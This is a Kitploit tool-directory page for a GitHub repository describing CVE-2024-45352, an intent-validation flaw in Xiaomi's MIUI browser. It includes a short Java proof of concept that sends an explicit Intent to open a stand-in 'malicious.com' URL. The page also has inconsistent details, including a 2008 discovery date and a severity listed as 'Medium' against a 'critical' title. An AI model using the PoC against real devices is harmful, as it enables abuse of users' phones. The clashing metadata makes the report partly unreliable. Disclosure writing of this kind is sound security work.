Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
xiaomi-cve-2024-45352 — Reporte técnico sobre vulnerabilidad crítica de Xiaomi | Kitploit
Tools/GitHubGitHub/edwins907/xiaomi-cve-2024-45352
Android SecurityVulnerability AnalysisExploitationWeb Application ExploitationMobile Security
GitHubedwins907/xiaomi-cve-2024-45352

xiaomi-cve-2024-45352

Reporte técnico sobre vulnerabilidad crítica de Xiaomi

View Repository
31 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

xiaomi-cve-2024-45352

Reporte técnico sobre vulnerabilidad crítica de Xiaomi Vulnerability Summary A vulnerability was discovered in Xiaomi's default browser (com.android.browser) on various MIUI devices. The app fails to properly validate intents passed via startActivity, allowing malicious apps to open arbitrary URLs or perform unintended actions.

  • CVE ID: CVE-2024-45352
  • Component
  • :com.android.browser
  • Severity: Medium
  • Status: Reported to Xiaomi (awaiting confirmation)
  • Date Found: [24 de abril del 2008]

🔥 Proof of Concept (PoC)

  1. Create a simple malicious app with the following intent:
root@kitploit:~
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);
Download Tool